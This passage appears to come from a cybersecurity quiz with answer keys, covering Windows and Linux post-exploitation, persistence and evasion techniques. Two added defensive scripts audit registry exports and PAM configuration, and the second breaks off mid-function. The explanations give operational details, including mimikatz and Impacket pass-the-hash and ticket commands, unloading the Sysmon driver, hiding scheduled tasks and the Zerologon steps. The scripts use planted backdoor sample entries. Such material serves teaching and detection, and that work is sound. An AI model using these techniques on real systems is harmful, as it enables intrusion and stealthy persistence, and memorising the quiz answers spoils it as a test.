146. How does “TrustedInstaller Abuse” allow attackers to gain persistence?
- A) Running code with system-level privileges by hijacking TrustedInstaller.exe
- B) Encrypting user files before exfiltration
- C) Modifying Active Directory schema for unauthorized access
- D) Conducting privilege escalation via browser vulnerabilities
✅ Answer: A) Running code with system-level privileges by hijacking TrustedInstaller.exe
Explanation: TrustedInstaller Abuse allows attackers to execute malware with SYSTEM privileges, bypassing standard restrictions.
147. What is the purpose of “Remote Thread Injection” in post-exploitation?
- A) Injecting malicious code into another process’s memory space
- B) Running a brute-force attack on a remote server
- C) Hijacking a user’s network session
- D) Encrypting all system logs
✅ Answer: A) Injecting malicious code into another process’s memory space
Explanation: Remote Thread Injection creates a new thread inside a legitimate process to execute malicious payloads stealthily.
148. How does “Hollow Process Injection” help attackers evade detection?
- A) Replacing the memory of a legitimate process with malicious code
- B) Encrypting stolen credentials before exfiltration
- C) Modifying registry keys to disable logging
- D) Using social engineering to trick users
✅ Answer: A) Replacing the memory of a legitimate process with malicious code
Explanation: Hollow Process Injection launches a trusted process but replaces its memory with malicious payloads, making detection harder.
149. What is “Phantom DLL Hijacking” used for in post-exploitation?
- A) Loading malicious DLLs when the system searches for non-existent ones
- B) Injecting JavaScript into browser sessions
- C) Exploiting an SQL database misconfiguration
- D) Spoofing MAC addresses for anonymity
✅ Answer: A) Loading malicious DLLs when the system searches for non-existent ones
Explanation: Phantom DLL Hijacking exploits applications that try to load missing DLLs, allowing attackers to place malicious DLLs in expected locations.
150. How does “AutoRun Persistence” help attackers maintain access?
- A) Placing malicious scripts in Windows startup locations
- B) Bypassing multifactor authentication
- C) Encrypting payloads to avoid detection
- D) Using DNS tunneling for data exfiltration
✅ Answer: A) Placing malicious scripts in Windows startup locations
Explanation: AutoRun Persistence ensures that malicious payloads execute at every system startup, keeping access active.
151. What is the primary function of “COM Hijacking” in persistence?
- A) Modifying Windows Component Object Model (COM) registry keys to execute malware
- B) Encrypting critical system files to demand ransom
- C) Running brute-force attacks against domain accounts
- D) Modifying BIOS firmware
✅ Answer: A) Modifying Windows Component Object Model (COM) registry keys to execute malware
Explanation: COM Hijacking exploits Windows COM objects, replacing them with malicious entries to maintain persistence.
152. How does an attacker use “WMI Backdoor” for persistence?
- A) Using Windows Management Instrumentation (WMI) to execute commands stealthily
- B) Injecting malware into the BIOS
- C) Running exploits through an SQL database
- D) Encrypting Windows event logs
✅ Answer: A) Using Windows Management Instrumentation (WMI) to execute commands stealthily
Explanation: WMI Backdoors use event triggers to execute malicious commands on target systems without requiring a file.
153. What is the advantage of using “Process Injection” over traditional malware execution?
- A) Runs malicious code within legitimate processes, avoiding detection
- B) Requires less system memory
- C) Provides faster network access
- D) Encrypts all system processes
✅ Answer: A) Runs malicious code within legitimate processes, avoiding detection
Explanation: Process Injection hides malware execution inside legitimate processes, making it harder to detect.
154. How does “Kernel Callback Injection” help attackers bypass security mechanisms?
- A) Manipulating kernel callbacks to execute malicious code in kernel mode
- B) Spoofing network traffic logs
- C) Encrypting system files for ransom
- D) Running brute-force attacks
✅ Answer: A) Manipulating kernel callbacks to execute malicious code in kernel mode
Explanation: Kernel Callback Injection abuses Windows kernel callbacks, giving attackers high-privilege execution.
155. What is the primary purpose of “APC Injection” in post-exploitation?
- A) Queueing malicious code for execution within a running thread
- B) Encrypting user credentials before exfiltration
- C) Running a phishing attack against system admins
- D) Injecting malware into BIOS firmware
✅ Answer: A) Queueing malicious code for execution within a running thread
Explanation: Asynchronous Procedure Call (APC) Injection schedules malicious execution within existing threads, reducing detection.
156. What is the role of “Fileless Malware” in evading security solutions?
- A) Executes entirely in memory without writing files to disk
- B) Disguises itself as a system driver
- C) Injects payloads into the boot sector
- D) Uses brute-force attacks to gain access
✅ Answer: A) Executes entirely in memory without writing files to disk
Explanation: Fileless Malware operates in memory, avoiding traditional antivirus file scans.
157. How does “Kerberos Ticket Granting Ticket (TGT) Theft” benefit attackers?
- A) Grants long-term access to Active Directory without requiring reauthentication
- B) Encrypts all system logs to avoid detection
- C) Modifies firewall rules to allow persistent access
- D) Runs brute-force attacks against domain controllers
✅ Answer: A) Grants long-term access to Active Directory without requiring reauthentication
Explanation: Stealing a Kerberos TGT allows attackers to continue accessing resources without re-entering credentials.
158. What persistence technique involves modifying “Image File Execution Options (IFEO)”?
- A) Replacing default debugger paths to execute malicious payloads
- B) Encrypting Windows system files
- C) Running exploits against Active Directory
- D) Injecting payloads into PowerShell scripts
✅ Answer: A) Replacing default debugger paths to execute malicious payloads
Explanation: IFEO Hijacking modifies debugger paths in the registry, making Windows execute malware instead of legitimate applications.
159. How does “Password Filter DLL Injection” help attackers?
- A) Capturing plaintext passwords during system authentication
- B) Disabling security features in Windows Defender
- C) Encrypting exfiltrated credentials
- D) Running ransomware payloads
✅ Answer: A) Capturing plaintext passwords during system authentication
Explanation: Password Filter DLL Injection allows attackers to hook into Windows authentication processes and steal passwords.
160. What is the primary goal of “NTFS Extended Attributes Abuse” in post-exploitation?
- A) Hiding malware within NTFS file attributes without altering file size
- B) Encrypting Windows event logs
- C) Modifying firewall rules to maintain persistence
- D) Spoofing system calls to evade detection
✅ Answer: A) Hiding malware within NTFS file attributes without altering file size
Explanation: Payloads can be stored in NTFS metadata, either in a file's extended attributes ($EA) or in an alternate data stream (file.txt:payload.exe), neither of which appears in a normal directory listing or changes the file's reported size. Alternate data streams can be listed with dir /r or Get-Item -Stream *; extended-attribute abuse needs forensic tooling that parses the MFT.
161. What is the primary goal of “Security Descriptor Modification” in post-exploitation?
- A) Changing access control permissions to maintain unauthorized access
- B) Injecting malware into security logs
- C) Modifying BIOS firmware for persistence
- D) Running brute-force attacks against Windows Defender
✅ Answer: A) Changing access control permissions to maintain unauthorized access
Explanation: Security Descriptor Modification changes the ACL on an object the attacker wants to come back to, for example granting a low-privileged account full control over a service, its registry key or a SYSTEM-run binary, or granting an account replication (DCSync) rights on the domain object. The backdoor is then just a permission, which survives password resets and looks like ordinary configuration unless ACLs are baselined.
162. How does “SID-History Injection” help attackers maintain access?
- A) Adding stolen security identifiers to an account to gain elevated privileges
- B) Injecting malware into kernel processes
- C) Encrypting all Active Directory credentials
- D) Running brute-force attacks on SSH servers
✅ Answer: A) Adding stolen security identifiers to an account to gain elevated privileges
Explanation: SID-History Injection writes a privileged SID (for example a Domain Admins SID from this or a trusted domain) into an account's sIDHistory attribute; that SID is then added to the account's access token at logon, so access checks grant whatever the injected SID is permitted. It bypasses authorization, not authentication, requires Domain Admin-level access to set up (e.g., via mimikatz sid::add or DCShadow), and is found by auditing accounts with a non-empty sIDHistory.
163. What is “Hidden Scheduled Task Persistence” in Windows?
- A) Creating a scheduled task that does not appear in normal task listings
- B) Encrypting user login credentials for later use
- C) Spoofing network traffic to hide from monitoring tools
- D) Exploiting PowerShell vulnerabilities to execute remote code
✅ Answer: A) Creating a scheduled task that does not appear in normal task listings
Explanation: One documented method deletes the task's SD (security descriptor) value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<task>, after which the task no longer appears in schtasks /query or the Task Scheduler UI but keeps running. Comparing the Tree and Tasks registry entries with each other and with the XML files under C:\Windows\System32\Tasks exposes it.
164. What attack method exploits “Group Managed Service Accounts (gMSA)” for persistence?
- A) Extracting cached credentials for later use
- B) Brute-forcing service account passwords
- C) Injecting malware into Active Directory logs
- D) Using PowerShell to disable security policies
✅ Answer: A) Extracting cached credentials for later use
Explanation: gMSA passwords are never typed by a person; they are stored in the account's msDS-ManagedPassword attribute and can be read over LDAP by any principal listed in PrincipalsAllowedToRetrieveManagedPassword, and they also sit in LSA secrets on hosts where the account runs. An attacker who compromises such a principal or host retrieves the blob, derives the NT hash, and uses it for pass-the-hash or Kerberos tickets. The password rotates (every 30 days by default), so the attacker must re-read it to keep access.
165. What is “Remote COM Object Hijacking” used for in post-exploitation?
- A) Executing malicious commands through COM objects on remote systems
- B) Modifying Windows registry keys to disable authentication logs
- C) Injecting payloads into browser processes
- D) Encrypting files before exfiltration
✅ Answer: A) Executing malicious commands through COM objects on remote systems
Explanation: This is lateral movement over DCOM: an attacker with local admin rights on the target instantiates a COM object on the remote host (for example MMC20.Application and its ExecuteShellCommand method, or ShellWindows/ShellBrowserWindow) and has it run a command under the caller's account, without touching the service control manager or WMI. It needs RPC/DCOM (TCP 135 plus dynamic ports) open to the target.
166. How does “Application Shimming” help attackers evade detection?
- A) Modifying Windows Application Compatibility settings to load malicious code
- B) Encrypting stolen data before exfiltration
- C) Injecting payloads into system processes
- D) Running ransomware payloads on boot
✅ Answer: A) Modifying Windows Application Compatibility settings to load malicious code
Explanation: Shim databases (.sdb) are installed with sdbinst.exe and recorded under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom and \InstalledSDB. Fixes such as InjectDll or RedirectEXE make a legitimate application load attacker code each time it starts, with no change to the application's own files.
167. What is the purpose of “Process Ghosting” in post-exploitation?
- A) Executing malicious processes that never appear in forensic analysis
- B) Injecting JavaScript into session cookies
- C) Modifying SMB settings to allow anonymous access
- D) Running exploits on outdated TLS protocols
✅ Answer: A) Executing malicious processes that never appear in forensic analysis
Explanation: Process Ghosting opens a file, marks it delete-pending (so nothing else can open it), writes the payload, creates an image section from it, closes the handle so the file is deleted, and then creates the process from that section. The executable no longer exists on disk when the process-creation callback fires, so EDR products that scan the image file at that point find nothing to scan. The process itself is still visible in process lists; what is defeated is file-based scanning at creation time.
168. How does “PowerShell Constrained Language Mode Bypass” help attackers?
- A) Disabling PowerShell security restrictions to execute unrestricted commands
- B) Running a phishing attack against system administrators
- C) Spoofing system update messages to trick users
- D) Modifying the BIOS firmware to execute malware at boot
✅ Answer: A) Disabling PowerShell security restrictions to execute unrestricted commands
Explanation: Constrained Language Mode (enforced by AppLocker or WDAC script rules, or the __PSLockdownPolicy variable) limits PowerShell to a safe subset: no arbitrary .NET type invocation, Add-Type, or COM objects. Bypasses include running PowerShell v2 if it is still installed, executing scripts from a path the policy trusts, or hosting the PowerShell engine (System.Management.Automation) in a custom binary that the script rules do not cover. Removing v2 and enforcing WDAC rather than AppLocker closes most of these.
169. What is “Custom Protocol Handler Exploitation” used for?
- A) Executing malicious code by abusing registered protocol handlers in Windows
- B) Spoofing DNS responses to redirect users to fake login pages
- C) Disabling Windows Defender via registry modifications
- D) Injecting payloads into SQL databases
✅ Answer: A) Executing malicious code by abusing registered protocol handlers in Windows
Explanation: Protocol handlers are registered under HKEY_CLASSES_ROOT\<scheme>\shell\open\command; opening a URL with that scheme (from a document, a browser or a link) launches the registered command with the URL as an argument. A handler the attacker registers, or a legitimate handler that passes the URL into a shell without sanitizing it, yields code execution.
170. How does “Netlogon Elevation of Privilege Exploit” help attackers?
- A) Gaining domain admin access by exploiting authentication flaws in Netlogon
- B) Injecting shellcode into Active Directory logs
- C) Brute-forcing Kerberos tickets
- D) Spoofing domain administrator credentials
✅ Answer: A) Gaining domain admin access by exploiting authentication flaws in Netlogon
Explanation: Zerologon (CVE-2020-1472) abuses Netlogon's use of AES-CFB8 with an all-zero IV: by sending all-zero client challenges, an unauthenticated attacker passes authentication in roughly 1 in 256 attempts and then calls NetrServerPasswordSet2 to set the domain controller's machine account password to empty. With that account the attacker runs DCSync to pull every domain hash, including krbtgt and the Domain Admins. Resetting the DC password also breaks the DC's own replication until restored, so the attack is noisy.
171. What is the purpose of “Kernel Object Hooking” in post-exploitation?
- A) Modifying kernel structures to hide malicious activity
- B) Exploiting buffer overflow vulnerabilities
- C) Encrypting all stored credentials before exfiltration
- D) Running brute-force attacks on VPN connections
✅ Answer: A) Modifying kernel structures to hide malicious activity
Explanation: Also known as Direct Kernel Object Manipulation (DKOM), this patches kernel data structures rather than code, for example unlinking a process's EPROCESS entry from the ActiveProcessLinks list so it disappears from tools that walk that list. It requires kernel-mode code execution, which on current Windows means a kernel exploit or a vulnerable signed driver because of Driver Signature Enforcement and PatchGuard.
172. How does “User Mode Rootkit” differ from a Kernel Mode Rootkit?
- A) It operates within standard user processes instead of kernel space
- B) It only targets mobile devices
- C) It modifies BIOS firmware instead of user files
- D) It encrypts all network communications
✅ Answer: A) It operates within standard user processes instead of kernel space
Explanation: User-mode rootkits hook APIs inside user processes (IAT or inline hooks in ntdll and kernel32) to filter what those processes see, so they need no driver or kernel exploit; kernel-mode rootkits modify the kernel itself and can hide from every process at once. User-mode hooks are exposed by comparing the in-memory code of a module with the file on disk.
173. What is the purpose of “NTLM Hash Injection” in post-exploitation?
- A) Authenticating as a legitimate user without knowing their password
- B) Spoofing email addresses for phishing attacks
- C) Encrypting NTFS partitions to prevent access
- D) Modifying SMB configurations to allow anonymous access
✅ Answer: A) Authenticating as a legitimate user without knowing their password
Explanation: This is pass-the-hash. NTLM authentication computes the challenge response from the NT hash, so the hash alone suffices: it is either placed into a new logon session (mimikatz sekurlsa::pth) or passed directly to tools such as Impacket's psexec.py or wmiexec.py with -hashes. The plaintext password is never needed, which is why local-admin password reuse across hosts is so damaging.
174. How do attackers use “SMB Named Pipe Impersonation” for privilege escalation?
- A) Creating rogue named pipes to intercept high-privilege processes
- B) Brute-forcing NTLM hashes to gain system access
- C) Injecting payloads into SMB file shares
- D) Modifying DNS entries for redirection
✅ Answer: A) Creating rogue named pipes to intercept high-privilege processes
Explanation: The attacker creates a named pipe, coerces a privileged process (typically a SYSTEM service) into connecting to it, and then calls ImpersonateNamedPipeClient to take on the client's token; with SeImpersonatePrivilege this yields SYSTEM. Meterpreter's getsystem (named-pipe technique) and RoguePotato work this way, so service accounts that hold SeImpersonatePrivilege are a privilege-escalation path in their own right.
175. What persistence method uses “Active Setup Registry Keys” in Windows?
- A) Running malware every time a new user logs in
- B) Encrypting PowerShell logs to avoid detection
- C) Running scheduled tasks under SYSTEM privileges
- D) Spoofing VPN connections
✅ Answer: A) Running malware every time a new user logs in
Explanation: Each subkey of HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components carries a StubPath command. At logon, Windows runs the StubPath for every component whose version has not yet been recorded under the user's HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components, so the command executes once for each user who logs on to the machine, including users created later. A StubPath pointing outside the Windows or Program Files directories is the giveaway.
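Questions 158, 159 and 175 each name a registry location that a persistence hunt should check. The following is an added example, not part of the quiz or of any product: it parses the text format written by reg export and flags an IFEO Debugger value, a non-default LSA notification package, and an Active Setup StubPath that launches something outside the Windows or Program Files directories. The hive paths are the real ones; the export text, the passflt package name, the {DEADBEEF-...} component and C:\Users\Public\update.exe are constructed for the demo (real exports are UTF-16LE files, so read them with that encoding before passing the text in).

```python
import re

# Constructed excerpt in the format `reg export` writes (inline str for the demo;
# real exports are UTF-16LE files). Every entry except the stock shell32 Active Setup
# component and the well-known hive paths is made up for illustration.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,70,00,\
  61,00,73,00,73,00,66,00,6c,00,74,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
"StubPath"="%SystemRoot%\\system32\\regsvr32.exe /s /n /i:U shell32.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{DEADBEEF-0000-4000-8000-000000000001}]
"StubPath"="C:\\Users\\Public\\update.exe"
'''

IFEO_KEY = r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
ACTIVE_SETUP_KEY = r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components'
LSA_KEY = r'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa'
# scecli is the stock entry; rassfm is additionally present on domain controllers.
DEFAULT_NOTIFICATION_PACKAGES = {'scecli', 'rassfm'}
TRUSTED_STUB_PREFIXES = ('%systemroot%\\', 'c:\\windows\\', 'c:\\program files')

VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def decode_value(raw):
    """Turn the textual .reg value encoding into a Python object."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.startswith('dword:'):
        return int(raw[6:], 16)
    m = re.match(r'hex(?:\((\d+)\))?:(.*)$', raw)
    if m:
        kind = int(m.group(1) or 3)                      # 3 = REG_BINARY
        data = bytes.fromhex(m.group(2).replace(',', ''))
        if kind == 7:                                    # REG_MULTI_SZ: UTF-16LE, NUL-separated
            return [s for s in data.decode('utf-16-le').split('\x00') if s]
        if kind == 2:                                    # REG_EXPAND_SZ
            return data.decode('utf-16-le').rstrip('\x00')
        return data
    return raw


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}."""
    text = re.sub(r',\\\r?\n\s*', ',', text)             # join hex continuation lines
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('Windows Registry Editor'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                name = m.group(1) if m.group(1) is not None else '(Default)'
                keys[current][name] = decode_value(m.group(2))
    return keys


def launched_program(command):
    """First token of a command line, lower-cased (handles a quoted path)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0].lower()
    return command.split()[0].lower() if command else ''


def audit(keys):
    """Return (category, subject, detail) tuples for the three persistence locations."""
    findings = []
    for key, values in keys.items():
        parent, _, leaf = key.rpartition('\\')
        if parent.lower() == IFEO_KEY.lower() and 'Debugger' in values:
            findings.append(('ifeo_debugger', leaf, values['Debugger']))
        elif parent.lower() == ACTIVE_SETUP_KEY.lower() and 'StubPath' in values:
            stub = values['StubPath']
            if not launched_program(stub).startswith(TRUSTED_STUB_PREFIXES):
                findings.append(('active_setup_stub', leaf, stub))
        elif key.lower() == LSA_KEY.lower():
            pkgs = values.get('Notification Packages', [])
            for pkg in ([pkgs] if isinstance(pkgs, str) else pkgs):
                if pkg.lower() not in DEFAULT_NOTIFICATION_PACKAGES:
                    findings.append(('lsa_notification_package', pkg, key))
    return findings


if __name__ == '__main__':
    for category, subject, detail in audit(parse_reg(SAMPLE_REG)):
        print(f'{category:<26} {subject:<45} {detail}')
```

What the script cannot tell you is whether a hit is benign: developer machines legitimately carry IFEO debuggers and third-party password-policy products ship notification packages, so treat each finding as a lead to verify against change records rather than as a verdict.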
176. What is the purpose of “Windows Sticky Notes Injection” in persistence?
- A) Embedding malicious payloads into Sticky Notes for execution
- B) Injecting malware into Windows boot sectors
- C) Modifying BIOS firmware to execute malware before the OS loads
- D) Encrypting user credentials before exfiltration
✅ Answer: A) Embedding malicious payloads into Sticky Notes for execution
Explanation: Sticky Notes keeps note content in a database in the user's profile (plum.sqlite under the app's LocalState folder); the application does not execute that content, so a payload stored there is a stash that a separate launcher (a Run value, scheduled task or script) must read and run. Its value to an attacker is that the file looks like ordinary user data and is rarely examined in triage.
177. How does “Sysmon Evasion” help attackers maintain stealth in post-exploitation?
- A) Disabling or bypassing Microsoft Sysmon logs to avoid detection
- B) Encrypting malware binaries to bypass antivirus
- C) Manipulating event log timestamps to prevent forensic analysis
- D) Injecting shellcode into legitimate processes
✅ Answer: A) Disabling or bypassing Microsoft Sysmon logs to avoid detection
Explanation: Sysmon can be blinded by unloading its minifilter driver (fltMC unload SysmonDrv), stopping the service, or pushing a weakened configuration; renaming the driver and service at install time makes those steps harder for an attacker. Sysmon records its own state and configuration changes (Event ID 4 and 16) and the driver unload appears in the System log, so forward logs off-host and alert when a Sysmon source goes silent.
178. What is “Rootkit Hypervisor Injection” used for in post-exploitation?
- A) Running a malicious hypervisor beneath the OS to control system execution
- B) Encrypting all files in a hidden partition
- C) Extracting passwords from memory using direct kernel access
- D) Brute-forcing NTLM authentication tokens
✅ Answer: A) Running a malicious hypervisor beneath the OS to control system execution
Explanation: A hypervisor-level rootkit (the Blue Pill concept) moves the running OS into a virtual machine it controls, so it can intercept privileged operations while the guest OS observes nothing unusual. It needs hardware virtualization (Intel VT-x or AMD-V) and kernel-level access to install, and it cannot take the hardware where a legitimate hypervisor already holds it, which is one reason virtualization-based security (Hyper-V/VBS) matters.
179. How do attackers use “Windows Services Hijacking” for persistence?
- A) Modifying legitimate services to execute malicious payloads on startup
- B) Overwriting system binaries with malicious code
- C) Disabling Windows Defender using registry modifications
- D) Spoofing user accounts to gain higher privileges
✅ Answer: A) Modifying legitimate services to execute malicious payloads on startup
Explanation: Typical forms are changing a service's binPath/ImagePath (sc config), replacing a service binary whose file ACL is weak, abusing an unquoted service path, or pointing a svchost-hosted service's ServiceDll at an attacker DLL. The payload then runs under the service account (often SYSTEM) on every boot; Service Control Manager event 7045 records new services and changed ImagePath values stand out against a baseline.
180. What is “Kerberos Ticket Injection” in post-exploitation?
- A) Injecting forged Kerberos tickets to bypass authentication
- B) Manipulating Active Directory logs to erase attack traces
- C) Extracting password hashes from NTDS.dit
- D) Spoofing DNS requests for network redirection
✅ Answer: A) Injecting forged Kerberos tickets to bypass authentication
Explanation: A Golden Ticket is a TGT forged with the krbtgt account's hash and works domain-wide until krbtgt is reset (twice); a Silver Ticket is a service ticket forged with a service account's hash and never contacts the domain controller at all. Either is injected into the current logon session (mimikatz kerberos::ptt or Rubeus /ptt) to impersonate any user the attacker names.
181. What is the purpose of “EtwTi ByPass” in evading detection?
- A) Disabling Event Tracing for Windows (ETW) and Threat Intelligence (Ti) logging
- B) Encrypting all system logs before exfiltration
- C) Using alternate authentication methods to bypass security policies
- D) Running brute-force attacks against Kerberos authentication
✅ Answer: A) Disabling Event Tracing for Windows (ETW) and Threat Intelligence (Ti) logging
Explanation: The Microsoft-Windows-Threat-Intelligence ETW provider (EtwTi) is a kernel-side source that reports memory operations such as remote allocation, remote writes, thread creation and APC injection to EDR consumers running as protected (ELAM-signed) processes. Unlike user-mode ETW, which malware can patch in its own process (ntdll!EtwEventWrite), EtwTi can only be silenced with kernel code execution, typically through a vulnerable signed driver, so an EtwTi bypass implies kernel-level tampering.
182. How does “Named Pipe Impersonation” help attackers escalate privileges?
- A) Creating malicious named pipes that intercept system processes
- B) Encrypting network traffic to hide communication
- C) Injecting shellcode into Active Directory services
- D) Modifying NTFS permissions to allow remote execution
✅ Answer: A) Creating malicious named pipes that intercept system processes
Explanation: The technique depends on SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege), which IIS, SQL Server and most service accounts hold by default; once a SYSTEM process connects to the attacker's pipe, the attacker impersonates its token. Sysmon Event ID 17 and 18 (pipe created and connected) show unusual pipe names and which processes connected to them.
183. What is “Indirect Syscall Execution” in post-exploitation?
- A) Executing system calls without direct interaction to evade security hooks
- B) Spoofing authentication tokens to bypass MFA
- C) Injecting shellcode into PowerShell scripts
- D) Brute-forcing NTLM authentication
✅ Answer: A) Executing system calls without direct interaction to evade security hooks
Explanation: EDRs hook the Nt* stubs in ntdll; direct syscalls avoid the hooks but leave a syscall instruction executing from the malware's own memory, which is itself a detection. Indirect syscalls load the syscall number in the malware's code and then jump to a genuine syscall; ret sequence inside ntdll, so the return address and call stack look like a normal API call. Kernel-side telemetry (EtwTi, object callbacks) still observes the resulting operations.
184. What is the primary use of “OAuth Token Theft” in post-exploitation?
- A) Gaining unauthorized access to cloud services using stolen OAuth tokens
- B) Injecting malicious code into email services
- C) Running privilege escalation exploits on VPN connections
- D) Manipulating authentication logs to prevent detection
✅ Answer: A) Gaining unauthorized access to cloud services using stolen OAuth tokens
Explanation: A stolen access or refresh token lets the attacker call cloud APIs as the user with neither the password nor a fresh MFA prompt, since both were satisfied when the token was issued. Refresh tokens stay valid until revoked or expired, so the response to token theft is revoking the user's sessions and refresh tokens, not merely resetting the password.
185. How does “Memory Module Stomping” help attackers evade detection?
- A) Overwriting the memory of legitimate modules with malicious code
- B) Encrypting files before exfiltration
- C) Bypassing multifactor authentication on Windows systems
- D) Modifying BIOS firmware to execute malware at startup
✅ Answer: A) Overwriting the memory of legitimate modules with malicious code
Explanation: Module stomping loads a legitimate signed DLL into the target process and overwrites its executable section with shellcode. The region stays image-backed and mapped to a signed file on disk, so scanners that only flag private, unbacked executable memory miss it; comparing the in-memory .text section with the file on disk reveals the overwrite.
186. What is the goal of “Reverse Port Binding” in post-exploitation?
- A) Establishing a remote connection by binding a service to a local port
- B) Encrypting exfiltrated data before sending it to an attacker
- C) Modifying Windows Defender exclusions via registry changes
- D) Injecting JavaScript into active web sessions
✅ Answer: A) Establishing a remote connection by binding a service to a local port
Explanation: A bind shell listens on a port on the compromised host and waits for the attacker to connect in, which only works if inbound traffic to that port is permitted. It is the opposite of a reverse shell, which connects outbound from the victim to the attacker and is usually preferred because egress filtering is typically looser than ingress filtering; neither option bypasses a firewall that inspects the relevant direction.
187. How does “Active Directory Shadow Credentials Exploitation” allow persistence?
- A) Creating a rogue authentication certificate to impersonate users
- B) Overwriting password hashes in NTDS.dit
- C) Spoofing domain administrator logins using stolen hashes
- D) Encrypting authentication logs to evade detection
✅ Answer: A) Creating a rogue authentication certificate to impersonate users
Explanation: Shadow Credentials writes a public key into the target account's msDS-KeyCredentialLink attribute (needing write access to it, for example GenericWrite over the object); the attacker then authenticates with the matching private key via PKINIT, receiving a TGT and, through it, the account's NT hash, without ever changing the password. It requires a CA and PKINIT support in the domain and persists until the attribute is cleaned up.
188. What is the purpose of “Office Add-in Persistence” in post-exploitation?
- A) Embedding malicious VBA code into Office add-ins for automatic execution
- B) Modifying Windows registry keys to disable logging
- C) Encrypting stored credentials before exfiltration
- D) Running brute-force attacks on Outlook accounts
✅ Answer: A) Embedding malicious VBA code into Office add-ins for automatic execution
Explanation: Office loads add-ins automatically: Excel XLL/XLA files in the user's XLSTART folder, Word WLL files and templates in STARTUP, and COM or VSTO add-ins registered under HKCU\Software\Microsoft\Office\<App>\Addins. Whatever is registered runs each time the application starts, under the user's account, and these locations are rarely inventoried; they are not limited to VBA.
189. How does “Remote Desktop Credential Hijacking” help attackers?
- A) Stealing plaintext RDP session credentials for unauthorized access
- B) Injecting malware into Windows Remote Desktop Services
- C) Modifying security policies to disable logging
- D) Running a ransomware payload through an RDP connection
✅ Answer: A) Stealing plaintext RDP session credentials for unauthorized access
Explanation: Credentials for interactive RDP logons are held by LSASS on the target and, with CredSSP and no Credential Guard, can be recovered in plaintext; with SYSTEM rights an attacker can also use tscon.exe to attach to another user's disconnected session without any credentials. Restricted Admin mode and Remote Credential Guard keep the password off the remote host.
190. What is “Pluggable Authentication Module (PAM) Backdoor” in Linux post-exploitation?
- A) Creating a malicious PAM module to allow stealthy authentication
- B) Modifying sudo configurations to escalate privileges
- C) Injecting shellcode into SSH sessions
- D) Encrypting authentication logs before exfiltration
✅ Answer: A) Creating a malicious PAM module to allow stealthy authentication
Explanation: A PAM backdoor is either a modified module (a rebuilt pam_unix.so that accepts a master password or logs every plaintext password) or a configuration change in /etc/pam.d that inserts an always-succeeding module such as pam_permit.so with the sufficient control before the real authentication. Because sshd, sudo, su and login all authenticate through PAM, one change covers every entry point; package verification (dpkg --verify or rpm -V) and a diff of /etc/pam.d against a known-good copy find it.
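As an added example of what a PAM backdoor hunt looks for (this code is not part of the quiz or of Linux-PAM), the script below flattens each service's auth stack in a pam.d directory, following @include, include and substack, and flags two patterns: a module loaded from a path outside the standard PAM module directories, and pam_permit.so placed where it can succeed the stack on its own. The sample pam.d tree is constructed; its common-auth mirrors the Debian layout, where the trailing auth required pam_permit.so is harmless, while the /tmp/.x/pam_helper.so line in sshd and the first line of su are the planted backdoors.

```python
import os
import re
import tempfile

# Constructed /etc/pam.d contents (not copied from any host). In common-auth the
# `success=1` on pam_unix skips pam_deny on success, so the trailing pam_permit is only
# reached by users who already authenticated; that is the stock Debian arrangement.
SAMPLE_PAMD = {
    'common-auth': (
        'auth\t[success=1 default=ignore]\tpam_unix.so nullok\n'
        'auth\trequisite\t\t\tpam_deny.so\n'
        'auth\trequired\t\t\tpam_permit.so\n'
    ),
    'sshd': (
        '@include common-auth\n'
        'auth\tsufficient\t/tmp/.x/pam_helper.so\n'      # module outside the PAM module dirs
        'account\trequired\tpam_nologin.so\n'
    ),
    'su': (
        'auth\tsufficient\tpam_permit.so\n'              # unconditional success before pam_unix
        'auth\tinclude\t\tcommon-auth\n'
    ),
}

TRUSTED_MODULE_DIRS = ('/lib/security/', '/lib64/security/', '/usr/lib/security/',
                       '/usr/lib64/security/', '/lib/x86_64-linux-gnu/security/',
                       '/usr/lib/x86_64-linux-gnu/security/')
# type  control(-field, possibly [bracketed])  module  [args...]; leading '-' means optional
LINE_RE = re.compile(r'^-?(auth|account|password|session)\s+(\[[^\]]*\]|\S+)\s+(\S+)')


def load_pamd(directory):
    """Read every regular file in a pam.d directory into {name: text}."""
    files = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, encoding='utf-8', errors='replace') as fh:
                files[name] = fh.read()
    return files


def auth_stack(name, files, _seen=None):
    """Flatten one service's auth stack, following @include / include / substack."""
    seen = _seen if _seen is not None else set()
    if name in seen or name not in files:
        return []
    seen.add(name)
    stack = []
    for line in files[name].splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('@include'):
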